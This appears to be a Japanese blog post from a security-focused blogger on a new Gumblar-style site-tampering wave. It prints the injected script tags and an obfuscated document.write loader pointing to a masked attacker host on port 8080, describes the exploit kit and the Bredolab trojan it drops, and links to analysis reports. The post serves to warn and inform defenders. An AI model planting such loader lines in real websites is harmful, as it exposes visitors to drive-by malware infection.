ここから本文です
サイトの改ざん、コンピュータウイルス・セキュリティ、検索エンジンYahoo!/Googleらへん...☆彡

書庫ウイルス・セキュリティ

 先週書いたGumbalar.8080の新タイプな改ざんコードですが、今週になってから誘導先のURLアドレスに新たなものがどんどこ大量投入されました。

 ぜーんぶ乗っ取られてしまった正規ドメインのURLアドレスっぽいので、ブラックリストタイプのURLブロック機能は対応されるまでの数日間はスルーしてしまう可能性が・・・。 :(

 改ざんされると、下のような不正なJavaScriptコードが挿入されます。

□ HTMLファイルの場合:
・位置はページの最後尾
<script type="text/javascript" src="http://●●.■■.▲▲:8080/***.js"></script>
<!--(〜 30文字程度の英数字 〜)-->
□ 外部JSファイルの場合:
・位置はファイルの最後尾
document.write('<s'+'cript type="text/javascript" src="http://●●.■■.▲▲▲:8080/***.js"></scr'+'ipt>');
サイト改ざん被害・攻撃サイト判定の対処方法

 この不正なコードで導かれる飛び先では、Microsoft関連、Java(JRE)Adobe Readerの脆弱性を悪用して、ウイルスを強制的に発動させようとしてます。

・Microsoft関連は、Windows XPに影響がある未修正ゼロデイ攻撃あり <26日追記
・Java(JRE)は、2010年4月に修正された脆弱性を悪用する処理が含まれてます。(参考ページ
・Adobe Reader(PDFファイル)は、最新版でも修正されてない脆弱性を悪用する処理(ゼロデイ状態)は今のとこ含まれてません。(参考ページ
昨日24日にゲットしてきた不正なPDFファイルの解析結果:
http://jsunpack.jeek.org/dec/go?report=d4f42df46ff348680c1322d6050e00b5c1b538a0
 (※セキュリティソフトが警告する場合アリ)


● 強制的に発動するウイルス
 脆弱性を悪用して最終的に強制発動する実行ファイルです。今日ゲットしてきたもの。Bredolabという名前のウイルスで、いろいろな別のウイルスを調達してきて感染させパソコンを乗っ取ります。

 先週あたりに投入されたものみたいで検知率は大分高いでしょうか。
VirusTotalの結果:
http://www.virustotal.com/jp/analisis/fc89cfc9ff5ff9dda2e83d96d95d8fd8e13c3634f31f445e870e366feaa7edaa-1277476491
 挙動を知るため、Comodoが提供してるマルウェア解析機に放り投げてみました。自分自身を「sisytj32.exe」というファイル名でスタートアップに登録して活動開始するようです。ちなみに、チョット前は「siszpe32.exe」というファイル名で、日本での感染報告がいくつかあがってます。
Comodo Instant Malware Analysisの結果:
http://camas.comodo.com/cgi-bin/submit?file=fc89cfc9ff5ff9dda2e83d96d95d8fd8e13c3634f31f445e870e366feaa7edaa

「ウイルス・セキュリティ」書庫の記事一覧

noooo_spam
noooo_spam
非公開 / 非公開
人気度
Yahoo!ブログヘルプ - ブログ人気度について
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
検索 検索
友だち(5)
  • 物知りマン
  • ★ピサロ★
  • Cookies
  • who
  • Kerupani129
友だち一覧

よしもとブログランキング

もっと見る
本文はここまでですこのページの先頭へ

[PR]お得情報

ふるさと納税サイト『さとふる』
実質2000円で特産品がお手元に
11/30までキャンペーン実施中!
数量限定!イオンおまとめ企画
「無料お試しクーポン」か
「値引きクーポン」が必ず当たる!

その他のキャンペーン

みんなの更新記事